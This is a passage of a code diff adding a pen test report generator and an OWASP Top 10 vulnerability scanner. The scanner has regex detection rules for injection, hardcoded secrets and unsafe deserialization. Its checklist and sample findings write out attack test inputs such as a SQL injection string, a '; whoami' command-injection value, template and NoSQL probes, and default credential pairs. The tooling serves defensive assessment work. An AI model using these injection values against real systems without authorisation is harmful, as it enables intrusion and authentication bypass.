findings_data = data + if isinstance(data, dict): + metadata = data.get("metadata", {}) + findings_data = data.get("findings", []) + + findings = [] + for item in findings_data: + findings.append(Finding( + title=item.get("title", "Untitled Finding"), + severity=item.get("severity", "medium"), + cvss_score=float(item.get("cvss_score", 0.0)), + category=item.get("category", "Uncategorized"), + description=item.get("description", ""), + evidence=item.get("evidence", "No evidence provided"), + impact=item.get("impact", ""), + remediation=item.get("remediation", ""), + cvss_vector=item.get("cvss_vector", ""), + references=item.get("references", []), + effort=item.get("effort", "medium"), + )) + return findings, metadata + + +def generate_sample_findings() -> str: + """Generate a sample findings JSON for reference.""" + sample = [ + { + "title": "SQL Injection in Login Endpoint", + "severity": "critical", + "cvss_score": 9.8, + "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "category": "A03:2021 - Injection", + "description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.", + "evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token", + "impact": "Full database access, authentication bypass, potential remote code execution.", + "remediation": "Use parameterized queries. Replace string concatenation with prepared statements.", + "references": ["https://cwe.mitre.org/data/definitions/89.html"], + "effort": "low" + }, + { + "title": "Stored XSS in User Profile", + "severity": "high", + "cvss_score": 7.1, + "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", + "category": "A03:2021 - Injection", + "description": "The user profile 'bio' field does not sanitize HTML input.", + "evidence": "Submitted in bio field.\nVisiting the profile page executes the payload.", + "impact": "Session hijacking, account takeover, phishing via stored malicious content.", + "remediation": "Sanitize all user input with DOMPurify. Implement Content-Security-Policy.", + "references": ["https://cwe.mitre.org/data/definitions/79.html"], + "effort": "low" + } + ] + return json.dumps(sample, indent=2) + + +def main(): + parser = argparse.ArgumentParser( + description="Pen Test Report Generator — Generate professional penetration testing reports from structured findings.", + formatter_class=argparse.RawDescriptionHelpFormatter, + epilog=""" +Examples: + %(prog)s --findings findings.json --format md --output report.md + %(prog)s --findings findings.json --format json + %(prog)s --sample > sample_findings.json + +Findings JSON format: + A JSON array of objects with: title, severity, cvss_score, category, + description, evidence, impact, remediation, cvss_vector, references, effort. + + Use --sample to generate a template. + """, + ) + parser.add_argument("--findings", metavar="FILE", + help="Path to findings JSON file") + parser.add_argument("--format", choices=["md", "json"], default="md", + help="Output format (default: md)") + parser.add_argument("--output", metavar="FILE", + help="Output file path (default: stdout)") + parser.add_argument("--json", action="store_true", dest="json_shortcut", + help="Shortcut for --format json") + parser.add_argument("--sample", action="store_true", + help="Print sample findings JSON and exit") + args = parser.parse_args() + + if args.sample: + print(generate_sample_findings()) + return + + if not args.findings: + parser.error("--findings is required (use --sample to generate a template)") + + if not Path(args.findings).exists(): + print(f"Error: File not found: {args.findings}", file=sys.stderr) + sys.exit(1) + + output_format = "json" if args.json_shortcut else args.format + findings, metadata = load_findings(args.findings) + + if not findings: + print("No findings loaded. Check the JSON file format.", file=sys.stderr) + sys.exit(1) + + generator = PentestReportGenerator(findings=findings, metadata=metadata) + + if output_format == "json": + result = json.dumps(generator.generate_json(), indent=2) + else: + result = generator.generate_markdown() + + if args.output: + Path(args.output).write_text(result, encoding="utf-8") + print(f"Report written to {args.output}") + else: + print(result) + + +if __name__ == "__main__": + main() diff --git a/engineering-team/security-pen-testing/scripts/vulnerability_scanner.py b/engineering-team/security-pen-testing/scripts/vulnerability_scanner.py new file mode 100644 index 0000000..e63fbe2 --- /dev/null +++ b/engineering-team/security-pen-testing/scripts/vulnerability_scanner.py @@ -0,0 +1,545 @@ +#!/usr/bin/env python3 +""" +Vulnerability Scanner - Generate OWASP Top 10 security checklists and scan for common patterns. + +Table of Contents: + VulnerabilityScanner - Main class for vulnerability scanning + __init__ - Initialize with target type and scope + generate_checklist - Generate OWASP Top 10 checklist for target + scan_source - Scan source directory for vulnerability patterns + _scan_file - Scan individual file for regex patterns + _get_owasp_checks - Return OWASP checks for target type + main() - CLI entry point + +Usage: + python vulnerability_scanner.py --target web --scope full + python vulnerability_scanner.py --target api --scope quick --json + python vulnerability_scanner.py --target web --source /path/to/code --scope full +""" + +import argparse +import json +import os +import re +import sys +from dataclasses import dataclass, asdict, field +from datetime import datetime +from pathlib import Path +from typing import Dict, List, Optional + + +@dataclass +class CheckItem: + """A single check item in the OWASP checklist.""" + owasp_id: str + owasp_category: str + check_id: str + title: str + description: str + test_procedure: str + severity: str # critical, high, medium, low, info + applicable_targets: List[str] = field(default_factory=list) + status: str = "pending" # pending, pass, fail, na + + +@dataclass +class SourceFinding: + """A vulnerability pattern found in source code.""" + rule_id: str + title: str + severity: str + owasp_category: str + file_path: str + line_number: int + code_snippet: str + recommendation: str + + +class VulnerabilityScanner: + """Generate OWASP Top 10 checklists and scan source code for vulnerability patterns.""" + + SCAN_EXTENSIONS = { + ".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go", + ".rb", ".php", ".cs", ".rs", ".html", ".vue", ".svelte", + } + + SKIP_DIRS = { + "node_modules", ".git", "__pycache__", ".venv", "venv", + "vendor", "dist", "build", ".next", "target", + } + + def __init__(self, target: str = "web", scope: str = "full", source: Optional[str] = None): + self.target = target + self.scope = scope + self.source = source + + def generate_checklist(self) -> List[CheckItem]: + """Generate OWASP Top 10 checklist for the given target and scope.""" + all_checks = self._get_owasp_checks() + filtered = [] + for check in all_checks: + if self.target not in check.applicable_targets and "all" not in check.applicable_targets: + continue + if self.scope == "quick" and check.severity in ("low", "info"): + continue + filtered.append(check) + return filtered + + def scan_source(self, path: str) -> List[SourceFinding]: + """Scan source directory for common vulnerability patterns.""" + findings = [] + source_path = Path(path) + if not source_path.exists(): + return findings + + for root, dirs, files in os.walk(source_path): + dirs[:] = [d for d in dirs if d not in self.SKIP_DIRS] + for fname in files: + fpath = Path(root) / fname + if fpath.suffix in self.SCAN_EXTENSIONS: + findings.extend(self._scan_file(fpath)) + return findings + + def _scan_file(self, file_path: Path) -> List[SourceFinding]: + """Scan a single file for vulnerability patterns.""" + findings = [] + try: + content = file_path.read_text(encoding="utf-8", errors="ignore") + except (OSError, PermissionError): + return findings + + patterns = [ + { + "rule_id": "SQLI-001", + "title": "Potential SQL Injection (string concatenation)", + "severity": "critical", + "owasp_category": "A03:2021 - Injection", + "pattern": r'''(?:execute|query|cursor\.execute)\s*\(\s*(?:f["\']|["\'].*%s|["\'].*\+\s*\w+|["\'].*\.format)''', + "recommendation": "Use parameterized queries or prepared statements instead of string concatenation.", + "extensions": {".py", ".js", ".ts", ".java", ".rb", ".php"}, + }, + { + "rule_id": "SQLI-002", + "title": "Potential SQL Injection (template literal)", + "severity": "critical", + "owasp_category": "A03:2021 - Injection", + "pattern": r'''(?:query|execute|raw)\s*\(\s*`[^`]*\$\{''', + "recommendation": "Use parameterized queries. Never interpolate user input into SQL strings.", + "extensions": {".js", ".ts", ".jsx", ".tsx"}, + }, + { + "rule_id": "XSS-001", + "title": "Potential DOM-based XSS (innerHTML)", + "severity": "high", + "owasp_category": "A03:2021 - Injection", + "pattern": r'''\.innerHTML\s*=\s*(?!['"][^'"]*['"])''', + "recommendation": "Use textContent or a sanitization library (DOMPurify) instead of innerHTML.", + "extensions": {".js", ".ts", ".jsx", ".tsx", ".html", ".vue", ".svelte"}, + }, + { + "rule_id": "XSS-002", + "title": "React dangerouslySetInnerHTML usage", + "severity": "high", + "owasp_category": "A03:2021 - Injection", + "pattern": r'''dangerouslySetInnerHTML''', + "recommendation": "Sanitize HTML with DOMPurify before using dangerouslySetInnerHTML.", + "extensions": {".jsx", ".tsx", ".js", ".ts"}, + }, + { + "rule_id": "CMDI-001", + "title": "Potential Command Injection (shell=True)", + "severity": "critical", + "owasp_category": "A03:2021 - Injection", + "pattern": r'''subprocess\.\w+\(.*shell\s*=\s*True''', + "recommendation": "Avoid shell=True. Use subprocess with a list of arguments instead.", + "extensions": {".py"}, + }, + { + "rule_id": "CMDI-002", + "title": "Potential Command Injection (eval/exec)", + "severity": "critical", + "owasp_category": "A03:2021 - Injection", + "pattern": r'''(?:^|\s)(?:eval|exec)\s*\((?!.*(?:#\s*nosec|NOSONAR))''', + "recommendation": "Never use eval() or exec() with untrusted input. Use ast.literal_eval() for data parsing.", + "extensions": {".py", ".js", ".ts"}, + }, + { + "rule_id": "SEC-001", + "title": "Hardcoded Secret or API Key", + "severity": "critical", + "owasp_category": "A02:2021 - Cryptographic Failures", + "pattern": r'''(?i)(?:api[_-]?key|secret[_-]?key|password|passwd|token)\s*[:=]\s*['\"][a-zA-Z0-9+/=]{16,}['\"]''', + "recommendation": "Move secrets to environment variables or a secrets manager (Vault, AWS Secrets Manager).", + "extensions": {".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go", ".rb", ".php"}, + }, + { + "rule_id": "SEC-002", + "title": "AWS Access Key ID detected", + "severity": "critical", + "owasp_category": "A02:2021 - Cryptographic Failures", + "pattern": r'''AKIA[0-9A-Z]{16}''', + "recommendation": "Remove the AWS key immediately. Rotate the credential and use IAM roles or environment variables.", + "extensions": None, # scan all files + }, + { + "rule_id": "CRYPTO-001", + "title": "Weak hashing algorithm (MD5/SHA1)", + "severity": "high", + "owasp_category": "A02:2021 - Cryptographic Failures", + "pattern": r'''(?:md5|sha1)\s*\(''', + "recommendation": "Use bcrypt, scrypt, or argon2 for passwords. Use SHA-256+ for integrity checks.", + "extensions": {".py", ".js", ".ts", ".java", ".go", ".rb", ".php"}, + }, + { + "rule_id": "SSRF-001", + "title": "Potential SSRF (user-controlled URL in HTTP request)", + "severity": "high", + "owasp_category": "A10:2021 - SSRF", + "pattern": r'''(?:requests\.get|fetch|axios|http\.get|urllib\.request\.urlopen)\s*\(\s*(?:request\.|req\.|params|args|input|user)''', + "recommendation": "Validate and allowlist URLs before making outbound requests. Block internal IPs.", + "extensions": {".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go"}, + }, + { + "rule_id": "PATH-001", + "title": "Potential Path Traversal", + "severity": "high", + "owasp_category": "A01:2021 - Broken Access Control", + "pattern": r'''(?:open|readFile|readFileSync|Path\.join)\s*\(.*(?:request\.|req\.|params|args|input|user)''', + "recommendation": "Sanitize file paths. Use os.path.basename() and validate against an allowlist.", + "extensions": {".py", ".js", ".ts", ".java", ".go"}, + }, + { + "rule_id": "DESER-001", + "title": "Unsafe Deserialization (pickle/yaml.load)", + "severity": "critical", + "owasp_category": "A08:2021 - Software and Data Integrity Failures", + "pattern": r'''(?:pickle\.load|yaml\.load\s*\([^)]*\)\s*(?!.*Loader\s*=\s*yaml\.SafeLoader))''', + "recommendation": "Use yaml.safe_load() instead of yaml.load(). Avoid pickle for untrusted data.", + "extensions": {".py"}, + }, + { + "rule_id": "AUTH-001", + "title": "JWT with hardcoded secret", + "severity": "critical", + "owasp_category": "A07:2021 - Identification and Authentication Failures", + "pattern": r'''jwt\.(?:encode|sign)\s*\([^)]*['\"][a-zA-Z0-9]{8,}['\"]''', + "recommendation": "Load JWT secrets from environment variables. Use RS256 with key pairs for production.", + "extensions": {".py", ".js", ".ts"}, + }, + ] + + lines = content.split("\n") + for i, line in enumerate(lines, 1): + for pat in patterns: + exts = pat.get("extensions") + if exts and file_path.suffix not in exts: + continue + if re.search(pat["pattern"], line): + findings.append(SourceFinding( + rule_id=pat["rule_id"], + title=pat["title"], + severity=pat["severity"], + owasp_category=pat["owasp_category"], + file_path=str(file_path), + line_number=i, + code_snippet=line.strip()[:200], + recommendation=pat["recommendation"], + )) + return findings + + def _get_owasp_checks(self) -> List[CheckItem]: + """Return comprehensive OWASP Top 10 checklist items.""" + checks = [ + # A01: Broken Access Control + CheckItem("A01", "Broken Access Control", "A01-01", + "Horizontal Privilege Escalation", + "Verify users cannot access other users' resources by changing IDs.", + "Change resource IDs in API requests (e.g., /users/123 → /users/124). Expect 403.", + "critical", ["web", "api", "all"]), + CheckItem("A01", "Broken Access Control", "A01-02", + "Vertical Privilege Escalation", + "Verify regular users cannot access admin endpoints.", + "Authenticate as regular user, request admin endpoints. Expect 403.", + "critical", ["web", "api", "all"]), + CheckItem("A01", "Broken Access Control", "A01-03", + "CORS Misconfiguration", + "Verify CORS policy does not allow arbitrary origins.", + "Send request with Origin: https://evil.com. Check Access-Control-Allow-Origin.", + "high", ["web", "api"]), + CheckItem("A01", "Broken Access Control", "A01-04", + "Forced Browsing", + "Check for unprotected admin or debug pages.", + "Request /admin, /debug, /api/admin, /.env, /swagger. Expect 403 or 404.", + "high", ["web", "all"]), + CheckItem("A01", "Broken Access Control", "A01-05", + "Directory Listing", + "Verify directory listing is disabled on the web server.", + "Request directory paths without index file. Should not list contents.", + "medium", ["web"]), + + # A02: Cryptographic Failures + CheckItem("A02", "Cryptographic Failures", "A02-01", + "TLS Version Check", + "Ensure TLS 1.2+ is enforced. Reject TLS 1.0/1.1.", + "Run: nmap --script ssl-enum-ciphers -p 443 target.com", + "high", ["web", "api", "all"]), + CheckItem("A02", "Cryptographic Failures", "A02-02", + "Password Hashing Algorithm", + "Verify passwords use bcrypt/scrypt/argon2 with adequate cost.", + "Review authentication code for hashing implementation.", + "critical", ["web", "api", "all"]), + CheckItem("A02", "Cryptographic Failures", "A02-03", + "Sensitive Data in URLs", + "Check for tokens, passwords, or PII in query parameters.", + "Review access logs and URL patterns for sensitive query params.", + "high", ["web", "api"]), + CheckItem("A02", "Cryptographic Failures", "A02-04", + "HSTS Header", + "Verify Strict-Transport-Security header is present.", + "Check response headers for HSTS with max-age >= 31536000.", + "medium", ["web"]), + + # A03: Injection + CheckItem("A03", "Injection", "A03-01", + "SQL Injection", + "Test input fields for SQL injection vulnerabilities.", + "Submit ' OR 1=1-- in input fields. Check for errors or unexpected behavior.", + "critical", ["web", "api", "all"]), + CheckItem("A03", "Injection", "A03-02", + "XSS (Cross-Site Scripting)", + "Test for reflected, stored, and DOM-based XSS.", + "Submit in input fields. Check if rendered.", + "high", ["web", "all"]), + CheckItem("A03", "Injection", "A03-03", + "Command Injection", + "Test for OS command injection in input fields.", + "Submit ; whoami in fields that may trigger system commands.", + "critical", ["web", "api"]), + CheckItem("A03", "Injection", "A03-04", + "Template Injection", + "Test for server-side template injection.", + "Submit {{7*7}} and ${7*7} in input fields. Check for 49 in response.", + "high", ["web", "api"]), + CheckItem("A03", "Injection", "A03-05", + "NoSQL Injection", + "Test for NoSQL injection in JSON inputs.", + "Submit {\"$gt\": \"\"} in JSON fields. Check for data leakage.", + "high", ["api"]), + + # A04: Insecure Design + CheckItem("A04", "Insecure Design", "A04-01", + "Rate Limiting on Authentication", + "Verify rate limiting exists on login and password reset endpoints.", + "Send 50+ rapid login requests. Expect 429 after threshold.", + "high", ["web", "api", "all"]), + CheckItem("A04", "Insecure Design", "A04-02", + "Business Logic Abuse", + "Test for business logic flaws (negative quantities, state manipulation).", + "Try negative values, skip steps in workflows, manipulate client-side calculations.", + "high", ["web", "api"]), + CheckItem("A04", "Insecure Design", "A04-03", + "Account Lockout", + "Verify account lockout after repeated failed login attempts.", + "Submit 10+ failed login attempts. Check for lockout or CAPTCHA.", + "medium", ["web", "api"]), + + # A05: Security Misconfiguration + CheckItem("A05", "Security Misconfiguration", "A05-01", + "Default Credentials", + "Check for default credentials on admin panels and services.", + "Try admin:admin, root:root, admin:password on all login forms.", + "critical", ["web", "api", "all"]), + CheckItem("A05", "Security Misconfiguration", "A05-02", + "Debug Mode in Production", + "Verify debug mode is disabled in production.", + "Trigger errors and check for stack traces, debug info, or verbose errors.", + "high", ["web", "api", "all"]), + CheckItem("A05", "Security Misconfiguration", "A05-03", + "Security Headers", + "Verify all security headers are present and properly configured.", + "Check for CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy.", + "medium", ["web"]), + CheckItem("A05", "Security Misconfiguration", "A05-04", + "Unnecessary HTTP Methods", + "Verify only required HTTP methods are enabled.", + "Send OPTIONS request. Check for TRACE, DELETE on public endpoints.", + "low", ["web", "api"]), + + # A06: Vulnerable Components + CheckItem("A06", "Vulnerable and Outdated Components", "A06-01", + "Dependency CVE Audit", + "Scan all dependencies for known CVEs.", + "Run npm audit, pip audit, govulncheck, or bundle audit.", + "high", ["web", "api", "mobile", "all"]), + CheckItem("A06", "Vulnerable and Outdated Components", "A06-02", + "End-of-Life Framework Check", + "Verify no EOL frameworks or languages are in use.", + "Check framework versions against vendor EOL dates.", + "medium", ["web", "api", "all"]), + + # A07: Authentication Failures + CheckItem("A07", "Identification and Authentication Failures", "A07-01", + "Brute Force Protection", + "Verify brute force protection on authentication endpoints.", + "Send 100 rapid login attempts. Expect blocking after threshold.", + "high", ["web", "api", "all"]), + CheckItem("A07", "Identification and Authentication Failures", "A07-02", + "Session Management", + "Verify sessions are properly managed (HttpOnly, Secure, SameSite).", + "Check cookie flags: HttpOnly, Secure, SameSite=Strict|Lax.", + "high", ["web"]), + CheckItem("A07", "Identification and Authentication Failures", "A07-03", + "Session Invalidation on Logout", + "Verify sessions are invalidated on logout.", + "Logout, then replay the session cookie. Should receive 401.", + "high", ["web", "api"]), + CheckItem("A07", "Identification and Authentication Failures", "A07-04", + "Username Enumeration", + "Check for username enumeration via error messages.", + "Submit valid and invalid usernames. Error messages should be identical.", + "medium", ["web", "api"]), + + # A08: Data Integrity + CheckItem("A08", "Software and Data Integrity Failures", "A08-01", + "Unsafe Deserialization", + "Check for unsafe deserialization of user input.", + "Review code for pickle.load(), yaml.load(), Java ObjectInputStream.", + "critical", ["web", "api"]), + CheckItem("A08", "Software and Data Integrity Failures", "A08-02", + "Subresource Integrity", + "Verify SRI hashes on CDN-loaded scripts and stylesheets.", + "Check